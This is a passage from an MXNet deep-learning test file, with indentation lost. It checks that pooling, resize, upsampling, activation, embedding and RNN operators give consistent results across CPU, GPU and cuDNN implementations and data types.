sym_list.append(sym)
check_consistency(sym_list, ctx_list, equal_nan=(not count_include_pad), tol=tol)
def test_pooling_dim(dim, pool_type, dtype, pool_op_list, p_value=2, count_include_pad=True,
tol=None):
if dim == '1D':
data = (3, 3, 10)
kernels = [(4,), (4,), (5,)]
pads = [(0,), (2,), (2,)]
strides = [(1,), (2,), (1,)]
elif dim == '2D_no_padding':
data = (3, 2, 20, 20)
kernels = [(3, 3), (4, 5)]
pads = [(0, 0), (0, 0)]
strides = [(1, 1), (2, 1)]
elif dim == '2D':
data = (2, 2, 20, 20)
kernels = [(3, 3), (3, 5), (4, 5), (4, 5)]
pads = [(0, 0), (1, 2), (0, 0), (2, 3)]
strides = [(1, 1), (1, 1), (2, 1), (1, 1)]
elif dim == '3D':
data = (2, 3, 20, 20, 20)
kernels = [(4, 5, 3), (4, 5, 3), (3, 5, 7)]
pads = [(0, 0, 0), (2, 3, 2), (1, 2, 3)]
strides = [(1, 1, 1), (2, 3, 1), (1, 1, 1)]
else:
raise RuntimeError('Unexpected pooling test class: {}.'.format(dim))
for kernel, pad, stride in zip(kernels, pads, strides):
for pooling_convention in ['valid', 'full']:
try:
test_pooling_versions_helper(pool_op_list=pool_op_list,
data=data, kernel=kernel, pad=pad, stride=stride,
pool_type=pool_type, pooling_convention=pooling_convention,
global_pool=False, p_value=p_value,
count_include_pad=count_include_pad, tol=tol, dtype=dtype)
except:
print('pool_op_list = {}'.format(pool_op_list))
print('kernel={}, pad={}, stride={}'.format(kernel, pad, stride))
print('pool_type={}, pooling_convention={}, global_pool=False'.format(pool_type,
pooling_convention))
print('p_value={}, count_include_pad={}, dtype={}'.format(p_value,
count_include_pad, dtype))
print('environ = \n{}'.format(os.environ))
raise
# Make sure kernel is ignored during global_pool by sometimes setting it to a crazy value
kernel = kernels[0]
if random_choice():
kernel = (300,) * len(kernel)
test_pooling_versions_helper(pool_op_list=pool_op_list,
data=data, kernel=kernel, pad=None, stride=None,
pool_type=pool_type, global_pool=True, p_value=p_value,
count_include_pad=count_include_pad, tol=tol, dtype=dtype)
# The various implementations of the standard pooling operator
std_pool_op_list = ['pool_cpu', 'pool_transposed_cpu',
'pool_gpu', 'pool_transposed_gpu',
'pool_cudnn', 'pool_transposed_cudnn']
# The implementations of the 'v1' pooling operator
v1_pool_op_list = ['pool_v1_cpu', 'pool_v1_gpu']
# For those cases where all implementations should match - the combined implementation list.
combo_pool_op_list = std_pool_op_list + v1_pool_op_list
for dtype in [np.float32, np.float64, np.float16]:
# Testing of the standard (not 'v1') pooling operator is universal across all
# data dimensions, implementations and layouts.
for dim in ['1D', '2D', '3D']:
test_pooling_dim(dim, 'max', dtype, std_pool_op_list)
test_pooling_dim(dim, 'avg', dtype, std_pool_op_list, count_include_pad=True)
test_pooling_dim(dim, 'avg', dtype, std_pool_op_list, count_include_pad=False)
test_pooling_dim(dim, 'sum', dtype, std_pool_op_list)
test_pooling_dim(dim, 'lp', dtype, std_pool_op_list, p_value=1)
test_pooling_dim(dim, 'lp', dtype, std_pool_op_list, p_value=2)
test_pooling_dim(dim, 'lp', dtype, std_pool_op_list, p_value=3)
# Testing of the 'v1' pooling operator is over its restricted support domain of
# 2D data only and not with the 'lp' pooling type. The 'v1' cpu and gpu versions are
# always tested against each other, and sometimes against the standard operator versions.
# The slightly different 'v1' definition prevents this in the following cases:
#
# 1. In max pooling, when multiple input values are the maximum in the input window,
# the 'v1' implementation backprops the gradient to all maxima, whereas the standard
# pooling operator backprops the gradient to the lowest-indexed maximum only.
# 2. In max pooling, the 'v1' operator pads with 0's and this value can become the
# maximum output value in the case of an all-negative input. The standard pooling
# operator effectively considers the padding to be the largest negative value, so
# only input values should appear in the output.
# 3. In avg pooling, the 'v1' operator divides the sum by the same window size factor,
# even at the edges, and so does not support count_include_pad = False (a small numpy
# sketch of this distinction follows this function).
# 4. The float16 'v1' pooling operator performs forward sums and averages in
# float16, whereas the std operators perform those calculations in float32, so
# greater float16 tolerances are needed when comparing across implementations.
# Double the float16 tol when comparing v1 and non-v1 implementations, per note 4 above.
relaxed_tol = {np.dtype(np.float16): 2e-1,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0,
np.dtype(np.int64): 0}
# Exclude std implementations due to points 1 and 2 above.
test_pooling_dim('2D', 'max', dtype, v1_pool_op_list)
# The standard and 'v1' implementations match for this case.
test_pooling_dim('2D', 'avg', dtype, combo_pool_op_list, count_include_pad=True,
tol=relaxed_tol)
# Exclude std implementations due to point 3 above.
test_pooling_dim('2D', 'avg', dtype, v1_pool_op_list, count_include_pad=False)
# The standard and 'v1' implementations match for this case.
test_pooling_dim('2D', 'sum', dtype, combo_pool_op_list, tol=relaxed_tol)
# We can compare the standard and 'v1' max pooling implementations if we eliminate padding
# (see point 2 above) and use np.float64 data so that no two random input window values are
# likely to be the same (see point 1 above).
test_pooling_dim('2D_no_padding', 'max', np.float64, combo_pool_op_list)
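# A minimal numpy sketch of point 3 in the notes inside test_pooling_versions above; it is
# illustrative only and not called by any test. For an average-pooling window that overlaps
# padding, count_include_pad=True divides by the full kernel size (the 'v1' behaviour),
# while count_include_pad=False divides only by the number of real input elements.
def _count_include_pad_sketch():
    window = np.array([0.0, 0.0, 4.0, 8.0])    # two zero-padded cells plus two real inputs
    kernel_size = window.size
    num_real_inputs = 2
    avg_include_pad = window.sum() / kernel_size      # (4 + 8) / 4 = 3.0
    avg_exclude_pad = window.sum() / num_real_inputs  # (4 + 8) / 2 = 6.0
    assert np.isclose(avg_include_pad, 3.0)
    assert np.isclose(avg_exclude_pad, 6.0)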
@with_seed()
def test_pooling_full_2d():
def test_pooling_full_2d_type(pool_type):
data = (2, 2, 10, 10)
kernel = (4, 5)
pad = (1, 2)
stride = (3, 4)
convention = 'full'
ctx_list = []
sym_list = []
# o_h = ceil((10 + 1 + 1 - 4) / 3) + 1 = 4
# o_w = ceil((10 + 2 + 2 - 5) / 4) + 1 = 4
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=convention, global_pool=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=convention, global_pool=False, name='pool'))
check_consistency(sym_list, ctx_list)
test_pooling_full_2d_type('max')
test_pooling_full_2d_type('avg')
test_pooling_full_2d_type('sum')
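# A minimal sketch of the output-size arithmetic noted inside test_pooling_full_2d above;
# it is illustrative only and not called by any test. The 'full' convention rounds
# (input + 2*pad - kernel) / stride up, 'valid' rounds it down, and both then add one.
def _pooling_convention_sketch():
    import math
    def out_size(input_size, kernel, pad, stride, convention):
        span = input_size + 2 * pad - kernel
        rounded = math.ceil(span / stride) if convention == 'full' else math.floor(span / stride)
        return rounded + 1
    # Matches the comment above: o_h = ceil((10 + 1 + 1 - 4) / 3) + 1 = 4 and
    # o_w = ceil((10 + 2 + 2 - 5) / 4) + 1 = 4 for the 'full' convention.
    assert out_size(10, 4, 1, 3, 'full') == 4
    assert out_size(10, 5, 2, 4, 'full') == 4
    # The same shapes under 'valid' give smaller, floor-based outputs.
    assert out_size(10, 4, 1, 3, 'valid') == 3
    assert out_size(10, 5, 2, 4, 'valid') == 3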
@with_seed()
def test_flatten_slice_after_conv():
ctx_list = []
data = mx.sym.Variable('conv_data')
conv = mx.symbol.Convolution(data=data, name='conv', num_filter=16, kernel=(3,3), stride=(1,1))
flatten = mx.symbol.flatten(data=conv)
slice_sym = mx.symbol.slice(data=flatten, begin=0, end=1)
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 16, 16, 16), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 16, 16, 16), 'type_dict': {'conv_data': np.float32}}]
check_consistency(slice_sym, ctx_list)
@with_seed()
def test_bilinear_resize_op():
ctx_list = [{'ctx': mx.cpu(0), 'data': (2, 2, 20, 20), 'type_dict': {'data': np.float32}},
{'ctx': mx.gpu(0), 'data': (2, 2, 20, 20), 'type_dict': {'data': np.float32}}]
data = mx.sym.Variable('data')
sym = mx.sym.contrib.BilinearResize2D(data, height=10, width=5, align_corners=True)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, height=10, width=5, align_corners=False)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=2, scale_width=0.5, mode='odd_scale', align_corners=True)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=2, scale_width=0.5, mode='odd_scale', align_corners=False)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=0.5, scale_width=2, mode='to_even_up', align_corners=True)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=0.5, scale_width=2, mode='to_even_up', align_corners=False)
check_consistency(sym, ctx_list)
@with_seed()
def test_global_pooling():
def test_1d_pooling(pool_type, p_value=2):
data = (2, 3, 20)
kernel = (4,)
pad = (2,)
stride = (2,)
ctx_list = []
sym_list = []
pooling_convention = 'valid'
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
check_consistency(sym_list, ctx_list)
def test_2d_pooling(pool_type, p_value=2):
data = (2, 3, 20, 20)
kernel = (4, 4)
pad = (2, 2)
stride = (2, 2)
ctx_list = []
sym_list = []
pooling_convention = 'valid'
if pool_type != 'lp':
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
check_consistency(sym_list, ctx_list)
test_1d_pooling('max')
test_1d_pooling('avg')
test_1d_pooling('sum')
test_1d_pooling('lp', p_value=1)
test_1d_pooling('lp', p_value=2)
test_1d_pooling('lp', p_value=3)
test_2d_pooling('max')
test_2d_pooling('avg')
test_2d_pooling('sum')
test_2d_pooling('lp', p_value=1)
test_2d_pooling('lp', p_value=2)
test_2d_pooling('lp', p_value=3)
@with_seed()
def test_upsampling_with_type():
sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='nearest', num_args=1)
ctx_list = [{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}},
{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float16}},
{'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
{'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_upsampling_bilinear_with_type():
sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='bilinear', num_args=1)
ctx_list = [{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}},
{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float16}},
{'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
{'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_concat_with_type():
sym = mx.sym.Concat(name='concat', num_args=2)
ctx_list = [{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}},
{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float16, 'concat_arg1': np.float16}},
{'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
{'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_elementwisesum_with_type():
dev_types = [[mx.gpu(0), [np.float64, np.float32, np.float16]],
[mx.cpu(0), [np.float64, np.float32]] ]
for num_args in range(1, 6):
ews_arg_shape = {}
for i in range(num_args):
ews_arg_shape['ews_arg'+str(i)] = (2, 10)
sym = mx.sym.ElementWiseSum(name='ews', num_args=num_args)
ctx_list = []
for dev, types in dev_types:
for dtype in types:
ews_arg_dtype = {'type_dict':{}}
for i in range(num_args):
ews_arg_dtype['type_dict']['ews_arg'+str(i)] = dtype
ctx_elem = {'ctx': dev}
ctx_elem.update(ews_arg_shape)
ctx_elem.update(ews_arg_dtype)
ctx_list.append(ctx_elem)
check_consistency(sym, ctx_list)
@with_seed()
def test_reshape_with_type():
sym = mx.sym.Reshape(name='reshape', shape=(-1,1,1,0))
ctx_list = [{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}},
{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float16}},
{'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
{'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_blockgrad_with_type():
sym = mx.sym.BlockGrad(name='bg')
ctx_list = [{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}},
{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float16}},
{'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
{'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_swapaxis_with_type():
sym = mx.sym.SwapAxis(name='swap', dim1=1)
ctx_list = [{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}},
{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float16}},
{'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
{'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_fullyconnected_with_type():
sym = mx.sym.FullyConnected(num_hidden=3, name='inner')
ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}},
{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float16}},
{'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
{'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}}]
check_consistency(sym, ctx_list)
# Sizes are divisible by 8 to test TensorCore on Volta GPU.
sym = mx.sym.FullyConnected(num_hidden=8, name='inner')
ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float16}},
{'ctx': mx.cpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_activation_with_type():
act_types = ['relu', 'sigmoid', 'tanh', 'softrelu', 'softsign']
shape = (2, 2, 10, 10)
for act_type in act_types:
sym = mx.sym.Activation(name='act', act_type=act_type)
ctx_list = [{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}},
{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}},
{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_lrn():
sym = mx.sym.LRN(alpha=0.0001, beta=0.75, knorm=2, nsize=5, name='lrn')
ctx_list = [{'ctx': mx.gpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}},
{'ctx': mx.cpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_embedding_with_type():
def test_embedding_helper(data_types, weight_types, low_pad, high_pad):
NVD = [[20, 10, 20], [200, 10, 300]]
for N, V, D in NVD:
sym = mx.sym.Embedding(name='embedding', input_dim=V, output_dim=D)
ctx_list = []
for data_type in data_types:
for weight_type in weight_types:
ctx_list.append({'ctx': mx.gpu(0), 'embedding_data': (N,),
'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
ctx_list.append({'ctx': mx.cpu(0), 'embedding_data': (N,),
'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
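# Indices are drawn from [-low_pad, V + high_pad), i.e. slightly outside the valid
# [0, V) range, presumably to exercise out-of-range index handling (low_pad is 0 for uint8).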
arg_params = {'embedding_data': np.random.randint(low=-low_pad, high=V+high_pad, size=(N,))}
check_consistency(sym, ctx_list, grad_req={'embedding_data': 'null','embedding_weight': 'write'},
arg_params=arg_params)
data_types = [np.float16, np.float32, np.float64, np.int32]
weight_types = [np.float16, np.float32, np.float64]
test_embedding_helper(data_types, weight_types, 5, 5)
data_types = [np.uint8]
weight_types = [np.float16, np.float32, np.float64]
test_embedding_helper(data_types, weight_types, 0, 5)
@with_seed()
def test_svmoutput_with_type():
sym = mx.sym.SVMOutput(name='svmoutput', use_linear=True)
ctx_list = [{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float64}},
{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float32}},
{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float16}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float64}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float32}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float16}}]
check_consistency(sym, ctx_list, use_uniform=True)
@with_seed()
def test_take_with_type():
sym = mx.sym.take(name='take')
for data_ndim in range(2, 5):
for idx_ndim in range(1, 4):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=3, high=6), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=3, high=5), )
ctx_list = [{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float64,
'take_a': np.float64}},
{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float32,
'take_a': np.float32}},
{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float16,
'take_a': np.float16}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float64,
'take_a': np.float64}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float32,
'take_a': np.float32}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float16,
'take_a': np.float16}}]
arg_params = {'take_indices': np.random.randint(low=0,
high=data_shape[0],
size=idx_shape),
'take_a': np.random.normal(size=data_shape)}
check_consistency(sym, ctx_list,
grad_req={'take_indices': 'null',
'take_a': 'write'},
arg_params=arg_params)
def check_rnn_consistency(cell1, cell2):
dshape = (32, 5, 200)
data = mx.sym.Variable('data')
sym1, _ = cell1.unroll(5, data, merge_outputs=True)
mod1 = mx.mod.Module(sym1, label_names=None, context=mx.gpu(0))
mod1.bind(data_shapes=[('data', dshape)], label_shapes=None)
sym2, _ = cell2.unroll(5, data, merge_outputs=True)
mod2 = mx.mod.Module(sym2, label_names=None, context=mx.gpu(0))
mod2.bind(data_shapes=[('data', dshape)], label_shapes=None)
mod1.init_params()
args, auxs = mod1.get_params()
args = cell1.unpack_weights(args)
args = cell2.pack_weights(args)
mod2.set_params(args, auxs)
batch=mx.io.DataBatch(data=[mx.random.uniform(shape=dshape)], label=[])
mod1.forward(batch, is_train=False)
mod2.forward(batch, is_train=False)
mx.test_utils.assert_allclose(mod1.get_outputs()[0], mod2.get_outputs()[0], rtol=1e-2, atol=1e-4)
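# Note on check_rnn_consistency: FusedRNNCell keeps its parameters in one packed blob while
# the unrolled stack uses per-layer weights; unpack_weights() followed by pack_weights()
# converts the initialized parameters between the two layouts so that both modules run the
# forward pass with identical weights before their outputs are compared.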
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnn():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='rnn_relu', prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.RNNCell(100, activation='relu', prefix='l0_'))
stack.add(mx.rnn.RNNCell(100, activation='relu', prefix='l1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_lstm_forget_bias():
forget_bias = 2.0
fused = mx.rnn.FusedRNNCell(10, forget_bias=forget_bias, num_layers=2, mode='lstm', prefix='')
dshape = (32, 1, 20)
data = mx.sym.Variable('data')
sym, _ = fused.unroll(1, data, merge_outputs=True)
mod = mx.mod.Module(sym, label_names=None, context=mx.gpu(0))
mod.bind(data_shapes=[('data', dshape)], label_shapes=None)
mod.init_params()
args, auxs = mod.get_params()
args = fused.unpack_weights(args)
bias_name = next(x for x in args if x.endswith('f_bias'))
expected_bias = forget_bias * np.ones(10, )
mx.test_utils.assert_allclose(args[bias_name], expected_bias)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_gru():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='gru', prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.GRUCell(100, prefix='l0_'))
stack.add(mx.rnn.GRUCell(100, prefix='l1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_bidirectional():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='gru', prefix='',
bidirectional=True)
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(100, prefix='l0_'),
mx.rnn.GRUCell(100, prefix='r0_'),
output_prefix='bi_gru_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(100, prefix='l1_'),
mx.rnn.GRUCell(100, prefix='r1_'),
output_prefix='bi_gru_1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_unfuse():
for mode in ['rnn_tanh', 'rnn_relu', 'lstm', 'gru']:
fused = mx.rnn.FusedRNNCell(
100, num_layers=2, mode=mode,
